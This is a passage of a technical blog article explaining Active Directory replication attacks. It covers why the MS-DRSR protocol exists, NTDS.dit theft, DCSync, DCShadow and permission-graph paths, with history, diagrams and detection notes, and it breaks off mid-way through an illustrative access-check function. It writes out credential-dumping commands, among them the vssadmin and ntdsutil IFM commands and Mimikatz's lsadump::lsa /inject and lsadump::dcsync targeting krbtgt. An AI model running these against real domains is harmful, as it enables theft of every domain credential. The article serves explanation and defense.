&lt;p&gt;That last sentence is the punchline of the entire field. The secret never touches the attacker&apos;s LSASS, so Credential Guard&apos;s design has nothing to say. The keys move from a remote domain controller&apos;s on-disk database, over an RPC channel, into the attacker&apos;s process memory. Credential Guard isolates LSASS on the &lt;em&gt;local&lt;/em&gt; machine. It has no jurisdiction over what a remote DC chooses to send when asked nicely.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Credential Guard isolates LSASS-resident secrets in a separate virtual trust level. DCSync reads secrets from a remote DC&apos;s NTDS.dit over MS-DRSR -- a network protocol attack, not a local-memory attack. Microsoft&apos;s Credential Guard documentation does not claim protection against MS-DRSR-based credential extraction [@credential-guard-considerations].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The 60-second timeline is not a marketing number. One RPC round trip per principal is the protocol&apos;s per-principal cost, fixed by specification. For a single high-value target -- and &lt;code&gt;krbtgt&lt;/code&gt; is the highest-value target in any Active Directory forest, because its long-term key signs every Kerberos ticket -- the attack is over before a typical SOC operator has finished pouring coffee.&lt;/p&gt;
&lt;p&gt;The four people whose names recur in this story are worth meeting now. Benjamin Delpy (gentilkiwi) wrote Mimikatz and authored both the DCSync read primitive (2015) and, with Vincent Le Toux, the DCShadow write primitive (2018). Vincent Le Toux built the original DCShadow implementation and the PingCastle posture-assessment tool. Sean Metcalf (Trimarc / ADSecurity) translated DCSync into operator vocabulary in the weeks after its release. Microsoft&apos;s Defender for Identity team ships the canonical first-party detections that fire on this attack class today.&lt;/p&gt;
&lt;p&gt;This story is what happens when a 23-year-old domain-controller-to-domain-controller protocol&apos;s access check turns out to gate on an ACL, not on whether the caller is a domain controller. Two ACEs on one object should not give an attacker the entire credential trove. The fact that they do is not a bug in the implementation. It is a 1999 design assumption -- that nobody who is not a DC would ever speak this protocol -- that survived twenty-five years as a social convention and was nowhere written down in the access-check code.&lt;/p&gt;
&lt;p&gt;The next section explains why Microsoft built this protocol in the first place, and why its access check forgot to ask the one question that would have closed the loophole.&lt;/p&gt;
&lt;h2&gt;2. Why the Protocol Exists at All&lt;/h2&gt;
&lt;p&gt;Rewind to February 17, 2000. Microsoft ships Windows 2000 Server, and Active Directory replaces the old NT 4.0 PDC/BDC model [@microsoft-windows-2000-launch]. NT 4.0 was single-master: one Primary Domain Controller held the authoritative account database, every Backup Domain Controller held a read-only copy, and a password change on the PDC propagated to BDCs through a hub-and-spoke replication channel. AD inverts the model. Every domain controller in an AD domain holds a writable copy of the directory; a password change on &lt;em&gt;any&lt;/em&gt; DC must propagate to every other DC within minutes; the replication topology is a mesh, not a star.&lt;/p&gt;
&lt;p&gt;Multi-master replication is the design constraint that forces MS-DRSR&apos;s existence. If any DC can accept a write, then every DC must be able to pull every change -- &lt;em&gt;including secret attributes&lt;/em&gt; like &lt;code&gt;unicodePwd&lt;/code&gt;, &lt;code&gt;dBCSPwd&lt;/code&gt;, &lt;code&gt;ntPwdHistory&lt;/code&gt;, &lt;code&gt;lmPwdHistory&lt;/code&gt;, and &lt;code&gt;supplementalCredentials&lt;/code&gt; -- from every other DC. There is no second protocol. Replication of secrets is replication, and replication is MS-DRSR [@ms-drsr-spec].&lt;/p&gt;

The RPC protocol by which any Active Directory domain controller can replicate any object, including secret attributes, from any other DC in the same forest. Layered over DCE/RPC; the current public specification is revision 46.0 dated March 9, 2026 [@ms-drsr-spec]. MS-DRSR is the mechanism that makes AD&apos;s multi-master replication invariant work.

The MS-DRSR method (opnum 3) that returns changed objects within a naming context. A calling DC supplies a target DN and a set of replication flags; the called DC returns the object&apos;s attribute values, with secret attributes encrypted under a session-derived key. This is the protocol method that DCSync invokes.

flowchart LR
    subgraph Domain[&quot;contoso.local domain&quot;]
        DCA[DC-A&lt;br /&gt;NTDS.dit]
        DCB[DC-B&lt;br /&gt;NTDS.dit]
        DCC[DC-C&lt;br /&gt;NTDS.dit]
    end
    DCA -- IDL_DRSGetNCChanges&lt;br /&gt;unicodePwd, ntPwdHistory --&amp;gt; DCB
    DCB -- IDL_DRSGetNCChanges&lt;br /&gt;supplementalCredentials --&amp;gt; DCA
    DCB -- IDL_DRSGetNCChanges&lt;br /&gt;dBCSPwd --&amp;gt; DCC
    DCC -- IDL_DRSGetNCChanges&lt;br /&gt;unicodePwd --&amp;gt; DCB
    DCA -- IDL_DRSGetNCChanges&lt;br /&gt;ntPwdHistory --&amp;gt; DCC
    DCC -- IDL_DRSGetNCChanges&lt;br /&gt;krbtgt keys --&amp;gt; DCA
&lt;p&gt;The access check that gates &lt;code&gt;IDL_DRSGetNCChanges&lt;/code&gt; is defined in [MS-DRSR] §4.1.10. It asks one question: does the calling principal hold the appropriate extended rights on the naming-context root being replicated? Extended rights are AD&apos;s mechanism for control-access permissions that do not fit into the standard ACL bit set [@ms-drsr-spec].&lt;/p&gt;

A schema-defined access-control right identified by a GUID rather than by a standard ACL bit. Extended rights are granted via an access-control entry on a target object and checked at runtime by the operation that requires them. The three replication extended rights are the canonical example: each is identified only by GUID, and each is checked by `IDL_DRSGetNCChanges` against the caller&apos;s effective rights on the naming-context root.

A top-level replication partition of the Active Directory database. Every AD forest has at least three NCs: the Schema NC, the Configuration NC, and one Domain NC per domain (plus optional Application NCs). DCSync operates against the Domain NC root.
&lt;p&gt;Three extended rights together form what practitioners call the rights triad. The two-checkmark version from §1 is the most-common configuration; the third right unlocks a smaller set of attributes flagged confidential. Microsoft&apos;s own AD schema documentation enumerates each one [@ad-schema-get-changes][@ad-schema-get-changes-all][@ad-schema-get-changes-filtered-set]:&lt;/p&gt;

The combination of three replication extended rights on a naming-context root: `DS-Replication-Get-Changes` (the baseline read), `DS-Replication-Get-Changes-All` (unlocks secret attributes), and `DS-Replication-Get-Changes-In-Filtered-Set` (unlocks attributes with the confidential flag). The first two are what most operators mean when they say &quot;DCSync rights&quot;; the third is sometimes required for completeness.
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Right&lt;/th&gt;
&lt;th&gt;Display name&lt;/th&gt;
&lt;th&gt;Rights-GUID&lt;/th&gt;
&lt;th&gt;What it unlocks&lt;/th&gt;
&lt;th&gt;Introduced&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;&lt;code&gt;DS-Replication-Get-Changes&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Replicating Directory Changes&lt;/td&gt;
&lt;td&gt;&lt;code&gt;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Baseline replication read&lt;/td&gt;
&lt;td&gt;Windows 2000 Server [@ad-schema-get-changes]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;DS-Replication-Get-Changes-All&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Replicating Directory Changes All&lt;/td&gt;
&lt;td&gt;&lt;code&gt;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Secret attribute replication (&lt;code&gt;unicodePwd&lt;/code&gt;, &lt;code&gt;ntPwdHistory&lt;/code&gt;, etc.) [@ad-schema-get-changes-all]&lt;/td&gt;
&lt;td&gt;Windows Server 2003&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;DS-Replication-Get-Changes-In-Filtered-Set&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Replicating Directory Changes In Filtered Set&lt;/td&gt;
&lt;td&gt;&lt;code&gt;89e95b76-444d-4c62-991a-0facbeda640c&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Confidential-flag attributes [@ad-schema-get-changes-filtered-set]&lt;/td&gt;
&lt;td&gt;Windows Server 2008&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;In a freshly-installed AD domain, four principal sets hold the rights triad by default on the Domain NC root: the &lt;code&gt;Domain Controllers&lt;/code&gt; group, the &lt;code&gt;Domain Admins&lt;/code&gt; group, the &lt;code&gt;Enterprise Admins&lt;/code&gt; group, and the built-in &lt;code&gt;Administrators&lt;/code&gt; group [@sean-metcalf-dcsync-2015]. Every other ACE on that object is a deliberate delegation choice made by some operator at some point in the domain&apos;s history.&lt;/p&gt;
&lt;p&gt;Now read the access check carefully. It asks whether the caller holds the rights. It does not ask anything about &lt;em&gt;who&lt;/em&gt; the caller is. The protocol does not check whether the caller&apos;s Service Principal Name is &lt;code&gt;GC/...&lt;/code&gt; or &lt;code&gt;ldap/...&lt;/code&gt; or anything else. It does not check whether the caller&apos;s machine account is in the &lt;code&gt;Domain Controllers&lt;/code&gt; group. It does not check whether the caller&apos;s Kerberos service ticket was issued for a DC service. The whole gate is the ACL on one object.&lt;/p&gt;
&lt;p&gt;This is the most consequential design omission in any Microsoft network protocol. Every other replication-style protocol in Windows ships some form of caller-machine-identity assertion. MS-DRSR shipped without one because, in 1999, nobody on the design team imagined an unprivileged workstation would speak the DC-to-DC protocol.&lt;/p&gt;
&lt;p&gt;The 1999 closed-population design assumption is the load-bearing fiction underneath this whole story. The protocol&apos;s designers assumed -- entirely reasonably for the deployment universe of that decade -- that the only software that would ever implement an MS-DRSR client was the DC role itself, which Microsoft shipped, signed, and audited. No defender in 1999 was thinking about a Python script speaking DRSUAPI from a desk. The assumption was a social convention dressed as a security model, and it survived for fifteen years.&lt;/p&gt;
&lt;p&gt;If the protocol exists to replicate every secret in the directory, and the access check is the ACL on one object, what stopped anyone from abusing it for the protocol&apos;s first fifteen years? That accidental safety period is the subject of the next section.&lt;/p&gt;
&lt;h2&gt;3. The Fifteen-Year Accidental Safety Period&lt;/h2&gt;
&lt;p&gt;Between 2000 and 2015, attackers who wanted the entire credential trove of an Active Directory domain had exactly one road open to them: reach a domain controller and steal its database. The reasons are not subtle. The credentials lived in one file -- &lt;code&gt;C:\Windows\NTDS\NTDS.dit&lt;/code&gt;, an Extensible Storage Engine database protected by a Password Encryption Key wrapped under the BootKey scattered across four registry values in the SYSTEM hive [@ntdsxtract-repo]. Without code execution on a DC, there was no obvious way to ask the directory for its secrets in bulk.&lt;/p&gt;

The on-disk Extensible Storage Engine (&quot;Jet Blue&quot;) database that holds every Active Directory object, including secret attributes. Located at `C:\Windows\NTDS\NTDS.dit` on every domain controller. The file is locked while AD DS is running; offline copying requires either Volume Shadow Copy snapshots, `ntdsutil ifm` bundling, or DC downtime [@mitre-t1003-003].
&lt;p&gt;Three sub-techniques bloomed inside this constraint, and MITRE catalogs them collectively as T1003.003 OS Credential Dumping: NTDS [@mitre-t1003-003]. Each is operationally distinct, and each requires the same precondition.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;G1a -- Volume Shadow Copy plus offline parse.&lt;/strong&gt; The attacker runs &lt;code&gt;vssadmin create shadow /for=C:&lt;/code&gt; on a domain controller, creating an instant point-in-time snapshot. They copy &lt;code&gt;NTDS.dit&lt;/code&gt; and &lt;code&gt;SYSTEM&lt;/code&gt; out of the shadow path, exfiltrate both files, and parse them offline with Csaba Barta&apos;s &lt;code&gt;ntdsxtract&lt;/code&gt; toolkit [@ntdsxtract-repo] or Impacket&apos;s &lt;code&gt;secretsdump.py&lt;/code&gt; running in offline mode. The parse walks the &lt;code&gt;datatable&lt;/code&gt; ESE table row by row, decrypts the PEK with the BootKey, and decrypts each principal&apos;s secret attributes with the PEK.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;G1b -- &lt;code&gt;ntdsutil&lt;/code&gt; Install From Media.&lt;/strong&gt; The built-in command &lt;code&gt;ntdsutil &quot;activate instance ntds&quot; &quot;ifm&quot; &quot;create full C:\Temp\IFM&quot;&lt;/code&gt; packages NTDS.dit and the SYSTEM hive into a clean bundle, intended for legitimate seeding of a new replica DC. With local admin on any DC, an attacker invokes it without involving VSS.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;G1c -- LSASS injection of the long-term DC secrets.&lt;/strong&gt; Mimikatz&apos;s pre-DCSync technique reads cached long-term secret material (including the &lt;code&gt;krbtgt&lt;/code&gt; key) directly out of &lt;code&gt;lsass.exe&lt;/code&gt; memory on a domain controller via &lt;code&gt;lsadump::lsa /inject /name:krbtgt&lt;/code&gt;. The variant that turned this surface into a persistence implant was Skeleton Key, disclosed by the Dell SecureWorks Counter Threat Unit on January 12, 2015 [@skeleton-key-wayback]. Skeleton Key patches the &lt;a href=&quot;https://paragmali.com/blog/ntlmless-the-death-of-ntlm-in-windows/&quot; rel=&quot;noopener&quot;&gt;NTLM&lt;/a&gt; and Kerberos validation routines in LSASS on a DC so that a single master password works for any account.&lt;/p&gt;
&lt;p&gt;Skeleton Key sits at the boundary between credential dumping and persistence. It does not produce usable NT hashes or Kerberos keys for offline forging; it gives the attacker a backdoor at the authentication step. The 2015 community debate over Skeleton Key versus the (then-imminent) DCSync technique was settled decisively by DCSync&apos;s August release: dumping the hashes is more useful than backdooring the auth path, because dumped hashes survive a DC reboot and are forge-ready material [@skeleton-key-wayback].&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Sub-technique&lt;/th&gt;
&lt;th&gt;Mechanism&lt;/th&gt;
&lt;th&gt;Canonical tool&lt;/th&gt;
&lt;th&gt;Emitted artifact&lt;/th&gt;
&lt;th&gt;Host artifact on DC&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;G1a VSS + offline parse&lt;/td&gt;
&lt;td&gt;Point-in-time snapshot, file copy, offline ESE parse&lt;/td&gt;
&lt;td&gt;&lt;code&gt;vssadmin&lt;/code&gt; + &lt;code&gt;secretsdump.py&lt;/code&gt; / &lt;code&gt;ntdsxtract&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;NT hashes, Kerberos keys, password history&lt;/td&gt;
&lt;td&gt;VSS event in system log&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;G1b &lt;code&gt;ntdsutil&lt;/code&gt; IFM&lt;/td&gt;
&lt;td&gt;Built-in admin command produces clean bundle&lt;/td&gt;
&lt;td&gt;&lt;code&gt;ntdsutil &quot;ac i ntds&quot; &quot;ifm&quot;&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Identical to G1a&lt;/td&gt;
&lt;td&gt;IFM staging directory&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;G1c LSASS inject&lt;/td&gt;
&lt;td&gt;Read long-term secrets from &lt;code&gt;lsass.exe&lt;/code&gt; memory&lt;/td&gt;
&lt;td&gt;&lt;code&gt;mimikatz lsadump::lsa /inject&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;krbtgt&lt;/code&gt; key and other LSA-cached secrets&lt;/td&gt;
&lt;td&gt;Process access of &lt;code&gt;lsass.exe&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The structural cost across all three is the same: code execution as SYSTEM on a domain controller. Read that requirement slowly. In a mature enterprise with even a basic tiered-administration model -- no interactive logon to DCs from workstations, &lt;a href=&quot;https://paragmali.com/blog/rdp-authentication-26-years/&quot; rel=&quot;noopener&quot;&gt;restricted-admin RDP&lt;/a&gt;, Privileged Access Workstations for Domain Admin sessions, Protected Users group membership for Tier Zero principals -- DCs are the most defended boundary in the network. An attacker who has crossed that boundary has, in operational terms, already won. The credential dump is the trophy lap.&lt;/p&gt;

flowchart TD
    Start[Attacker foothold&lt;br /&gt;on workstation]
    Start --&amp;gt; VSS[G1a: VSS snapshot&lt;br /&gt;+ offline parse]
    Start --&amp;gt; IFM[G1b: ntdsutil IFM&lt;br /&gt;create full]
    Start --&amp;gt; Inject[G1c: LSASS inject&lt;br /&gt;on DC]
    VSS --&amp;gt; Gate[SYSTEM on DC]
    IFM --&amp;gt; Gate
    Inject --&amp;gt; Gate
    Gate --&amp;gt; Creds[All domain credentials&lt;br /&gt;NT hashes, Kerberos keys, krbtgt]
&lt;p&gt;This is what made the closed-population design assumption survive its first fifteen years. The protocol&apos;s design was open to abuse from any joined workstation that held the rights triad, but nobody noticed because the cheaper attack road -- compromise a DC, parse the database offline -- still passed through a defended chokepoint. The ACL on the Domain NC was nowhere on a defender&apos;s risk register, because no offensive tooling existed that treated the ACL as the gate.&lt;/p&gt;
&lt;p&gt;There was a question waiting to be asked, though. &lt;em&gt;What if you could ask the DC to send you the credentials, using a protocol the DC already speaks fluently with its peers?&lt;/em&gt; The protocol&apos;s wire format is published. Microsoft Learn hosts the IDL. The DCs trust each other&apos;s calls by ACL. The only missing piece was a client implementation that any attacker could run from any joined machine.&lt;/p&gt;
&lt;p&gt;In August 2015 the missing piece arrived.&lt;/p&gt;
&lt;h2&gt;4. Generation by Generation&lt;/h2&gt;
&lt;p&gt;August 11, 2015, 01:27 Central European Time. Benjamin Delpy commits 47,132 insertions to the Mimikatz repository in a single push titled &lt;em&gt;&quot;DCSync in mimikatz &amp;amp; for XP/2003.&quot;&lt;/em&gt; The diff introduces four new modules -- &lt;code&gt;kull_m_rpc_drsr.c/.h&lt;/code&gt; and &lt;code&gt;kull_m_rpc_ms-drsr.h/_c.c&lt;/code&gt; -- generated from the [MS-DRSR] IDL. They are an MS-DRSR client surface, slotted into &lt;code&gt;kuhl_m_lsadump.c&lt;/code&gt; as the new &lt;code&gt;lsadump::dcsync&lt;/code&gt; command [@mimikatz-dcsync-commit][@mimikatz-repo]. Vincent Le Toux is credited as co-author.&lt;/p&gt;
&lt;p&gt;Six weeks later Sean Metcalf writes the canonical operator post and presents the technique at DerbyCon V on Friday, September 25, 2015, in the Track 1 (Break Me) slot from 3:00 to 3:50 pm [@sean-metcalf-dcsync-2015][@sean-metcalf-derbycon-2015]. The closed-population assumption shatters in a weekend.&lt;/p&gt;

A commit hash widely cited in operator forums for the DCSync introduction -- `79b3577aed999baac0352cb1ba3a5f86b6d29f34`, dated 2015-07-20 -- does not exist in the Mimikatz repository. A `git --no-pager log --all` against a fresh clone returns `fatal: bad object` for that hash; the GitHub commit URL returns 404; the GitHub API returns 422. The actual introducing commit is `7717b7a7173fa6a6b6566bbbc3e7372b464d988f`, authored by Benjamin DELPY at 2015-08-11 01:27:13 +0200, with the subject line *&quot;DCSync in mimikatz &amp;amp; for XP/2003&quot;* [@mimikatz-dcsync-commit]. Sean Metcalf&apos;s contemporary writeup at ADSecurity confirms August 2015 as the release month [@sean-metcalf-dcsync-2015]. The lesson for verifying any third-party claim about a Mimikatz commit is the same lesson Stage 1 of this article&apos;s research pipeline applied: clone the repo, run `git show`.
&lt;p&gt;What follows is the story of four generations of attacker approaches against this protocol, each motivated by the operational limit of the previous one.&lt;/p&gt;
&lt;h3&gt;Generation 2: DCSync (2015-08-11 onward)&lt;/h3&gt;
&lt;p&gt;Mimikatz becomes a DRSUAPI client. Operator invocation is one line:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;lsadump::dcsync /domain:contoso.local /user:krbtgt
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Behind that line, six wire steps fire:&lt;/p&gt;

sequenceDiagram
    participant A as Attacker workstation
    participant DC as Target DC (DRSUAPI)
    A-&amp;gt;&amp;gt;DC: 1. resolve target DC by domain
    A-&amp;gt;&amp;gt;DC: 2. IDL_DRSBind (interface UUID DRSUAPI)
    DC--&amp;gt;&amp;gt;A: 3. bind reply (handle, session key)
    A-&amp;gt;&amp;gt;DC: 4. IDL_DRSGetNCChanges (opnum 3, MTX_ADDR DN, EXOP_REPL_OBJ)
    DC--&amp;gt;&amp;gt;A: 5. DRS_MSG_GETCHGREPLY (encrypted secret attributes)
    A-&amp;gt;&amp;gt;A: 6. decrypt with session key, emit NT hash and Kerberos keys
&lt;p&gt;The wire format is one round trip per principal. To dump every account in the domain, Mimikatz&apos;s &lt;code&gt;/all /csv&lt;/code&gt; mode iterates the request server-side via the same opnum with paginating up-to-date vectors. Per-call wire size is a few kilobytes for a single user; full-domain bulk dumps run to tens of megabytes. Wall-clock time is dominated by network latency to the target DC [@sean-metcalf-dcsync-2015][@trellix-silent-domain-hijack].&lt;/p&gt;
&lt;p&gt;The Generation-1 precondition is gone. The attack runs from any joined workstation. The Generation-1 host artifacts -- VSS events, IFM staging directories, multi-megabyte file copies -- all disappear. The only on-the-wire signature is &lt;em&gt;&quot;an &lt;code&gt;IDL_DRSGetNCChanges&lt;/code&gt; call from an IP that is not a domain controller&quot;&lt;/em&gt; -- which has to be detected at the protocol layer, not the host layer.&lt;/p&gt;
&lt;p&gt;Sean Metcalf&apos;s 2015 post named the detection recipe in the same breath as the attack: &lt;em&gt;&quot;Configure IDS to trigger if DsGetNCChange request originates an IP not on the &apos;Replication Allow List&apos; ...&quot;&lt;/em&gt; [@sean-metcalf-dcsync-2015]. Every network detection rule in this space, including Microsoft&apos;s own ATA &quot;Unusual Protocol Implementation&quot; category two years later, descends from that one sentence [@ata-v17-release-notes].&lt;/p&gt;
&lt;p&gt;DCSync is read-only. The ACL pair the attack exploits does not include directory-write rights. An attacker who wants to plant SID-history backdoors, modify &lt;code&gt;userAccountControl&lt;/code&gt; flags, or write to AdminSDHolder needs a different primitive. The same trust loophole that gave them read access turns out to support a symmetric write side.&lt;/p&gt;
&lt;h3&gt;Generation 3: DCShadow (2018-01-24)&lt;/h3&gt;
&lt;p&gt;January 23-24, 2018. Benjamin Delpy and Vincent Le Toux present at BlueHat IL in Tel Aviv. The talk is titled &lt;em&gt;&quot;Active Directory: What can make your million dollar SIEM go blind?&quot;&lt;/em&gt; [@youtube-bluehat-2018-dcshadow]. Four days later, on January 27, 2018, Delpy pushes the mainline merge to Mimikatz with commit &lt;code&gt;ab18bd1&lt;/code&gt;, subject &lt;em&gt;&quot;Pushing @vletoux DCShadow in current branch with some adaptations&quot;&lt;/em&gt; [@mimikatz-dcshadow-commit].&lt;/p&gt;
&lt;p&gt;Vincent Le Toux contributed the original implementation; the BlueHat IL talk shared joint Delpy/Le Toux billing; the Mimikatz mainline merge commit &lt;code&gt;ab18bd103a5cd7e26fb8d475c5ea0157d6633ca9&lt;/code&gt; is dated 2018-01-27 01:37:55 +0100, four days after the conference disclosure. Le Toux is the same author behind PingCastle&apos;s posture-assessment tooling and the canonical &lt;code&gt;dcshadow.com&lt;/code&gt; reference site [@mimikatz-dcshadow-commit][@dcshadow-com].&lt;/p&gt;
&lt;p&gt;DCShadow inverts DCSync. Where DCSync makes the attacker a DRSUAPI client, DCShadow makes the attacker a DRSUAPI &lt;em&gt;server&lt;/em&gt;. The mechanism: temporarily register an &lt;code&gt;nTDSDSA&lt;/code&gt; object plus the associated SPNs in the Configuration NC; signal to a legitimate DC that the new &quot;DC&quot; wants to push changes via &lt;code&gt;IDL_DRSReplicaAdd&lt;/code&gt; followed by &lt;code&gt;IDL_DRSReplicaSync&lt;/code&gt;; the legitimate DC pulls the attacker&apos;s pre-staged writes through the replication channel as if they were legitimate peer replication; deregister to clean up [@mitre-t1207][@dcshadow-com].&lt;/p&gt;

sequenceDiagram
    participant A as Attacker (rogue DC)
    participant Cfg as Configuration NC
    participant T as Target DC
    A-&amp;gt;&amp;gt;Cfg: 1. create nTDSDSA + server object
    A-&amp;gt;&amp;gt;Cfg: 2. add SPNs (GC, DRS UUID) to machine account
    A-&amp;gt;&amp;gt;T: 3. IDL_DRSReplicaAdd (dsaSrc = attacker)
    T-&amp;gt;&amp;gt;A: 4. IDL_DRSGetNCChanges callback (target pulls)
    A--&amp;gt;&amp;gt;T: 5. staged writes returned as replication payload
    A-&amp;gt;&amp;gt;T: 6. IDL_DRSReplicaDel
    A-&amp;gt;&amp;gt;Cfg: 7. delete nTDSDSA, remove SPNs

A directory operation that does not generate the standard Event ID 4662 / 4738 / 5136 object-modification events that the Domain Services Auditing subsystem emits for normal writes. Legitimate DC-to-DC replication is SACL-silent by design -- the audit subsystem intentionally suppresses change events on the replication channel to avoid drowning every DC in audit traffic on every directory change. DCShadow writes are SACL-silent because they ride the same channel.
&lt;p&gt;That last design fact is the entire point of the talk title. A SIEM watching object-modification events sees nothing when a DCShadow write lands, because the modifications arrive on the replication channel that the SIEM intentionally ignores as routine DC chatter. The original 2018 framing -- &quot;your million-dollar SIEM goes blind&quot; -- was correct for SIEMs that monitored only object-modification events. We will see in §6 how that framing has aged.&lt;/p&gt;
&lt;p&gt;DCShadow is &lt;em&gt;write&lt;/em&gt; capability. An attacker who reaches it can plant SID-history backdoors (write &lt;code&gt;S-1-5-21-...-519&lt;/code&gt; for Enterprise Admins into a low-privileged account&apos;s &lt;code&gt;sIDHistory&lt;/code&gt;), modify &lt;code&gt;userAccountControl&lt;/code&gt; to clear &lt;code&gt;ACCOUNTDISABLE&lt;/code&gt; on dormant high-privilege accounts, add ACEs to AdminSDHolder (which then propagate via the SDProp process to every protected admin account every 60 minutes), or set &lt;code&gt;msDS-AllowedToActOnBehalfOfOtherIdentity&lt;/code&gt; on a target computer to enable resource-based constrained delegation chains.&lt;/p&gt;
&lt;h3&gt;Generation 4: Permission-graph attacks (2018-present)&lt;/h3&gt;
&lt;p&gt;By 2018 the attack-side question had shifted. &lt;em&gt;Holding the rights triad directly&lt;/em&gt; was no longer the interesting precondition; the interesting question was how to reach it transitively, through whatever chain of ACL delegations a real-world domain happened to contain. The umbrella term that emerged is permission-graph attack. Its terminal edge is still DCSync; its novelty is the path that gets you to the terminal.&lt;/p&gt;
&lt;p&gt;Three primitives anchor this generation. Elad Shamir&apos;s &lt;em&gt;Wagging the Dog&lt;/em&gt; (January 28, 2019) showed how writing &lt;code&gt;msDS-AllowedToActOnBehalfOfOtherIdentity&lt;/code&gt; on a target computer object enables S4U2Self plus S4U2Proxy impersonation of any user to that computer [@shenaniganslabs-wagging-the-dog]. Shamir&apos;s &lt;em&gt;Shadow Credentials&lt;/em&gt; (June 21, 2021) demonstrated that writing &lt;code&gt;msDS-KeyCredentialLink&lt;/code&gt; on a target account adds an attacker-controlled certificate trust, enabling Kerberos PKINIT authentication as that account without resetting its password [@eladshamir-shadow-credentials]. And Sean Metcalf&apos;s earlier work on AdminSDHolder template abuse showed that writing the AdminSDHolder ACL causes SDProp to propagate the new ACL onto every protected admin account every 60 minutes -- self-healing persistence that survives defender cleanup [@sean-metcalf-adminsdholder].&lt;/p&gt;
&lt;p&gt;The unifying observation: DCSync is a terminal in a permission graph. The graph&apos;s nodes are AD principals; its edges are individual access-control entries (&lt;code&gt;WriteDACL&lt;/code&gt;, &lt;code&gt;WriteOwner&lt;/code&gt;, &lt;code&gt;GenericAll&lt;/code&gt;, &lt;code&gt;WriteProperty&lt;/code&gt;, &lt;code&gt;AddMember&lt;/code&gt;, &lt;code&gt;ForceChangePassword&lt;/code&gt;). Whoever can traverse the graph to the rights triad on the domain root has DCSync transitively. The attacker&apos;s job is no longer to invoke &lt;code&gt;IDL_DRSGetNCChanges&lt;/code&gt;; it is to find the shortest path through the graph from a foothold to the rights triad. The defender&apos;s mirror job is to enumerate all paths into the rights triad and either prune them or monitor them.&lt;/p&gt;

gantt
    title Domain replication attack class evolution
    dateFormat YYYY-MM-DD
    axisFormat %Y
    section Attack
    Gen 1 NTDS.dit theft           :a1, 2000-02-17, 2015-08-11
    Gen 2 DCSync                   :active, a2, 2015-08-11, 2026-12-31
    Gen 3 DCShadow                 :active, a3, 2018-01-24, 2026-12-31
    Gen 4 Permission-graph chains  :active, a4, 2018-06-01, 2026-12-31
    section Defense
    BloodHound 1.0 DEF CON 24     :d1, 2016-08-06, 30d
    ATA 1.7 release                :d2, 2017-04-01, 30d
    Azure ATP DCShadow alerts      :d3, 2018-07-24, 30d
    Azure ATP rebrand to MDI       :d4, 2020-09-22, 30d
    BloodHound v6.0                :d5, 2024-09-30, 30d
    BloodHound v6.3 Butterfly      :d6, 2024-12-09, 30d
    BloodHound v8.0 OpenGraph      :d7, 2025-07-29, 30d
    Trellix NDR Silent Hijack      :d8, 2025-12-08, 30d
&lt;p&gt;To make the read-side access check decision concrete -- and to expose how thin it actually is -- here is the logic of the gate written as a runnable function. This is pseudocode for the &lt;em&gt;decision&lt;/em&gt;, not the protocol bytes:&lt;/p&gt;
&lt;p&gt;{`
// Illustrative model of the MS-DRSR access check on IDL_DRSGetNCChanges.
// Returns &quot;secrets returned&quot; or &quot;ACCESS_DENIED&quot; given a caller&apos;s effective
// rights on the naming-context root.
function dcsyncAccessCheck(callerRights, ncRootDn, requestedAttrs) {
  const GET_CHANGES         = &apos;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2&apos;;
  const GET_CHANGES_ALL     = &apos;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2&apos;;
  const GET_CHANGES_FILTERED = &apos;89e95b76-444d-4c62-991a-0facbeda640c&apos;;&lt;/p&gt;
&lt;p&gt;  const SECRET_ATTRS = new Set([&apos;unicodePwd&apos;, &apos;dBCSPwd&apos;,
    &apos;ntPwdHistory&apos;, &apos;lmPwdHistory&apos;, &apos;supplementalCredentials&apos;]);
  const wantsSecrets = requestedAttrs.some(a =&amp;gt; SECRET_ATTRS.has(a));&lt;/p&gt;
&lt;p&gt;  // Baseline read requires GetChanges.
  if (!callerRights.has(GET_CHANGES)) return &apos;ACCESS_DENIED&apos;;
  // Secret attributes require GetChangesAll.
  if (wantsSecrets &amp;amp;&amp;amp; !callerRights.has(GET_CHANGES_ALL))
    return &apos;ACCESS_DENIED&apos;;&lt;/p&gt;
&lt;p&gt;  // Notice what is NOT checked: caller&apos;s SPN, machine-group membership,
  // ticket service, source IP. The access gate is the ACL, full stop.
  return &apos;secrets returned&apos;;
}&lt;/p&gt;
&lt;p&gt;const attacker = new Set([
